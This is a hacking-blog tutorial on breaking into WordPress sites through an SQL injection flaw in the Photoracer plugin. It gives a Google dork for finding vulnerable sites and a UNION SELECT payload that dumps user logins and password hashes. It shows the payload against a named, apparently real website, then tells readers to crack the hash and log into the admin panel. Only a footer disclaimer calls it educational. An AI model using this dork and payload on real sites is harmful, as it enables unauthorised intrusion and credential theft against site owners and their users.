How to hack Wordpress website with Phototrace SQLi vulnerability



Hi here i tell you how to hack wordpress site with easy way i will use exploit to hack sites i saw lots of Messages that say "hey help can anyone can tell me how to hackwordpress" and it's an easy way with exploit ?

http://timani.net/wp-content/uploads/2010/04/wordpress-logo-300x282.png

First we search with this in google to find sites
inurl:"wp-content/plugins/photoracer/viewimg.php?id="

see the Result :-



[Image: asdmr.png]

and i'm gonna test 1 of them for ex this find in google

http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2


we are going to add the exploit : this is the exploit


/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


and the site look like this


http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


http://img638.imageshack.us/img638/2927/asddy.png



now you can see the user and pass :D ! Just crack the hash and it's done
The admin panel is

http://Site/wp-login.php


Responses

0 Respones to "How to hack Wordpress website with Phototrace SQLi vulnerability"

Post a Comment

Instructions

THIS WEBSITE IS BUILT BY ME FOR EDUCATIONAL PURPOSE. IF YOU USE THIS INFORMATION TO HARM ANY SUBSTANCE OR COMMUNITY PERSONALLY AND GOT CAUGHT THAN WE ARE NOT RESPONSIBLE, EXPAND YOUR INFORMATION,SHARE UR THOUGHTS AND KNOWLEDGE WITH US. MAIL ME ON RRRICKY.SAINI2@GMAIL.COM

Contributors

Stay Connected

DMCA.com
Return to top of page Copyright © 2011 | Platinum Theme Converted into Blogger Template by devzcyberarena